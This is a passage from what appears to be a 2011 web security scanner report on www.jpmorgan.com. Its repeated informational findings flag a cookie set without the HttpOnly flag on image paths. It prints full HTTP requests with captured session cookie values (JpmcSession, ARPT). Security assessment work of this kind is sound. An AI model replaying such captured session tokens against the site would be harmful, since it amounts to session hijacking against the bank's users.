Cookie: ACE_COOKIE=R2666079405; ARPT=NKOJWQS188.21-cws7214CKJKQ; JpmcSession=R1LrTc1Gcyk5wJvssGFbvLfYwwHQYdBm63BnpnCQbywrZyFdscZB!-8473515; __utma=214076236.1911910703.1310488007.1310488007.1310488007.1; __utmb=214076236.1.10.1310488007; __utmc=214076236; __utmz=214076236.1310488007.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:26:58 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 579
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR................|....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..T.j.A..;.o.P.....B..!] ...n._.}.4..e...i.v!..`@l...`#".7.....]...,;.....Z.R.......'....r.....S.4.B\.R..
...[SNIP]...

11.237. http://www.jpmorgan.com/images/lightview/prev.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:33 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 572
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR................|....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..T=k.A..;....B.:...X.t....;..Z.L.&.... h..6...H.H!6.EP......%w.f...s..{of....J%R...3..Y...#.?...{...3.8.
...[SNIP]...

11.238. http://www.jpmorgan.com/images/lightview/topclose.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/topclose.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/topclose.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 684
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR............._%.-....tEXtSoftware.Adobe ImageReadyq.e<...NIDATx...=k.Q.../.._...N.P.&....N.....R.: ....K....h?H.[.....n..T....w....)...O.=......].JE....N.Jq....)~(.+.*~.+..g0.l..h.\?
...[SNIP]...

11.239. http://www.jpmorgan.com/images/logo_jpm_2008.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/logo_jpm_2008.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo_jpm_2008.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
Accept-Ranges: bytes
Content-Length: 2153
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..)..........H4)k[R.........yjc.xqVC9:#.?).;%....='.<&.!.......,......)....PI&.b8..k~Y(> &....l...G.4v.V..|O..[0...;..r.....(.`80Z$..Pca.R..{..47...^..?....x...26.B.b....zJ.(XYLV|}.L) 3}o7pGxlfW
...[SNIP]...

11.240. http://www.jpmorgan.com/images/logo_jpm_2008_bw.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/logo_jpm_2008_bw.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo_jpm_2008_bw.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Tue, 29 Jul 2008 12:47:20 GMT
Accept-Ranges: bytes
Content-Length: 2180
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..+.............aaa...ZZZ.........QQQzzz.........EEE|||.........%%%---...@@@...vvvHHHeee\\\............:::......VVV III..................***.........nnn.........MMM...888000...666...kkk...pppO
...[SNIP]...

11.241. http://www.jpmorgan.com/images/menu_tab_left.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/menu_tab_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_tab_left.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:45 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 19:05:49 GMT
Accept-Ranges: bytes
Content-Length: 388
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................%....
...[SNIP]...

11.242. http://www.jpmorgan.com/images/menu_tab_right.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/menu_tab_right.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_tab_right.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:45 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 19:05:50 GMT
Accept-Ranges: bytes
Content-Length: 862
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................%....
...[SNIP]...

11.243. http://www.jpmorgan.com/images/more_services_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/more_services_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/more_services_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:31 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......tc[...P<1...?).dQI...5..!.......,..........(x...0.I....S..B.y.1...H(..P[.$Hu.E.[.....;

11.244. http://www.jpmorgan.com/images/navbar_leftcorner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/navbar_leftcorner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_leftcorner.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......pijbYW;%...!.......,..........4....=...gR....+/Q.X.. ".9....i...m...S|....B.... ....;

11.245. http://www.jpmorgan.com/images/navbar_map.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/navbar_map.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_map.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:32 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
Accept-Ranges: bytes
Content-Length: 243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a+.......yi..x...xk^.........e]]!.......,....+......x...0.I..8..3P..u...Fj.S0.....$.cE.......P.)x..q)(.r...P....FS..NU.C............4...u..xj..f.
?(`TP.].}..1.hSh.\F.7\M.Rq...o...;.,..ga...3c.).,
...[SNIP]...

11.246. http://www.jpmorgan.com/images/navbar_rightcorner2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/navbar_rightcorner2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_rightcorner2.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Fri, 28 Aug 2009 21:36:39 GMT
Accept-Ranges: bytes
Content-Length: 90
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......PA;...2.....!.......,..........+.............<.
T...R .Q.>e.....s..Ln...K...;

11.247. http://www.jpmorgan.com/images/news_buttons.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/news_buttons.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/news_buttons.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:32 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 00:08:28 GMT
Accept-Ranges: bytes
Content-Length: 2373
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H.....C....................................................................C.......................................................................f.(.................................
...[SNIP]...

11.248. http://www.jpmorgan.com/images/news_gradient_cell.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/news_gradient_cell.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/news_gradient_cell.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:32 GMT
Server: Apache
Last-Modified: Thu, 04 Dec 2008 23:30:19 GMT
Accept-Ranges: bytes
Content-Length: 316
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................*...................................
...[SNIP]...

11.249. http://www.jpmorgan.com/images/print_grey.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/print_grey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/print_grey.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:05 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 21:03:12 GMT
Accept-Ranges: bytes
Content-Length: 974
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.....K.............jjjzzz...fffQQQ...}}}............^^^......fff...............\\\...aaadddkkk<<<...WWWiiiPPP...TTT...lll[[[???|||uuu............wwwWWWaaauuulll...~~~AAApppmmmgggmmm............y
...[SNIP]...

11.250. http://www.jpmorgan.com/images/scnd_body_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_body_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_body_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 21:51:22 GMT
Accept-Ranges: bytes
Content-Length: 160
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.. ...........................3..#....................M..?.............................................!.......,...... .... .....p0...O3..c./..H....P...;

11.251. http://www.jpmorgan.com/images/scnd_client_logon.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_client_logon.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_client_logon.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
